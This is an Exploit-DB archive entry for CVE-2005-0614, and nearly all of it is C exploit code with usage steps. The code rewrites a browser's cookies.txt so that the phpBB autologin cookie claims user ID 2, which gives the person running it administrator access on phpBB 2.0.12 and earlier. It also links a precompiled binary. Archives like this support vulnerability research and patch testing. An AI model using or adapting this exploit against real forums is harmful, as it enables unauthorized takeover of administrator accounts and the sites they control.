phpBB <= 2.0.12 - Change User Rights Authentication Bypass c code

2005-03-24T00:00:00
ID EDB-ID:897
Type exploitdb
Reporter str0ke
Modified 2005-03-24T00:00:00

Description

phpBB. CVE-2005-0614. Webapps exploit for php platform

                                        
                                            /* Paisterist's code was nice but heres mil's version.
 * precompiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/897.rar
 * Usage: 
 * bcc32 897.cpp
 * and place the exe in your firefox profile dir.
 * Usually C:\Documents and Settings\Application Data\Mozilla\Firefox\Profiles\something.default
 * Visit a site with phpbb, close the browser, double click the exe, browse site.
 * This gives anonymous users administrator rights only.
 * Ya its lame im bored kthnx. If something goes wrong clear cookies.
 * 
 * /str0ke
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//Taken from VeNoMouS's love cow code
char *search_and_replace (char *text, char *find, char *replace)
{
char *found,*new_text;
int
len_find=strlen(find),len_replace=strlen(replace),len_text=strlen(text),i=0,j=0;

if((new_text=(char*)malloc(len_text+len_replace-len_find+1))==NULL)
       {
       printf("malloc issue...\n");
       return new_text;
       }
found = strstr(text, find);
while (i <= len_text)
{
if ( found != text + i )
       {
       new_text[j] = text[i];
       i++;
       j++;
       }
       else
       {
           strcat (new_text, replace);
           i += len_find;
           j += len_replace;
           found = strstr (text + i, find);
       }
       new_text[j] = '\0';
}
return new_text;
}

int main()
{
  FILE * pFile;
  long lSize;
  char * buffer;

  pFile = fopen ( "cookies.txt" , "r" );
  if (pFile==NULL) exit (1);

  fseek (pFile , 0 , SEEK_END);
  lSize = ftell (pFile);
  rewind (pFile);

  buffer = (char*) malloc (lSize);
  if (buffer == NULL) exit (2);
  fread (buffer,1,lSize,pFile);
  fclose (pFile);

  pFile = fopen ( "cookies.txt" , "w" );
  fputs(search_and_replace((char *)buffer,"a%3A0%3A%7B%7D","a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"), pFile);
  fclose (pFile);
  free (buffer);
  return 0;

}

// milw0rm.com [2005-03-24]